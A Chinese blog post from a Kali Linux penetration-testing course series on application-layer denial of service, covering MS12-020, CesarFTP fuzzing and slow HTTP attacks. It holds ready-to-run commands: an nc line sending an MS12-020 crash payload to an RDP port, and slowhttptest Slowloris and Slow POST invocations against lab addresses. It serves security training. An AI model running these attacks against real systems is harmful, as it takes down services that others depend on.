Kali Linux渗透测试 132 拒绝服务--应用层DoS 攻击

版权声明:本文为博主原创连载文章,为了内容连贯性,未经博主允许不得转载。 https://blog.csdn.net/Kevinhanser/article/details/79905182

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 应用服务漏洞

    • 服务代码存在漏洞,遇异常提交数据时程序崩溃
    • 应用处理大量并发请求能力有限,被拒绝的是应用或OS
  • 缓冲区溢出漏洞

    • 向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存
    • 影响: 远程代码执行、DOS
    • 利用模糊测试方法发现缓冲区溢出漏洞
  • CesarFTP 0.99 服务漏洞

    • ftp_fuzz.py # MKD/RMD
  • MS12-020 远程桌面协议DOS漏洞

2. 攻击测试 MS12-020

root@kali:~# searchsploit ms12-020
root@kali:~# cp /usr/share/exploitdb/exploits/windows/dos/18606.txt .
root@kali:~# mv 18606.txt  MS12-020.txt
root@kali:~# leafpad MS12-020.txt 
root@kali:~# nc 10.10.10.141 3389 < termdd_1.dat

3. Slowhttptest

  • Slowhttptest (源自google)

    • 低带宽应用层慢速DOS攻击(相对于CC等快速攻击而言的慢速)
    • 最早由Python编写,跨平台支持(Linux、win、Cygwin、OSX)
    • 尤其擅长攻击apache.tomcat (几乎百发百中)
  • 攻击方法

    • Slowloris、Slow HTTP POST 攻击
      • 耗尽应用的并发连接池,类似于Http层的Syn flood
      • HTTP协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或不完整 服务器时钟为其保留连接资源池占用,此类大量并发将导致DOS
      • Slowloris: 完整的http请求结尾是rnirn, 攻击发……
      • Slow POST: HTTP头content-length声明长度,但body部分缓慢发送
  • 攻击方法

    • Slow Read attack攻击
    • 与slowloris and slow POST目的相同,都是耗尽应用的并发连接池
    • 不同之处在于请求正常发送,但慢速读取响应数据
    • 攻击者调整TCPwindow窗口大小,是服务器慢速返回数据
  • 攻击方法

    • Apache Range Header attack
      • 客户端传输大文件时,体积查过HTTP Body大小限制时进行分段
      • 耗尽服务器CPU、内存资源
  • ulimite -n 70000

  • HTTP Post 攻击模式

    • slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3
  • slowloris 攻击模式

    • slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://10.10.10.132 -x 24 -p 3
  • 支持代理

  • 大量应用服务器和安全设备都无法防护慢速攻击

4. 攻击测试

root@kali:~# slowhttptest -c 60000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 999999


root@kali:~# slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -s 8192 -t GET -u http://10.10.10.132 -x 10 -p 3



root@kali:~# man slowhttptest
展开阅读全文

没有更多推荐了,返回首页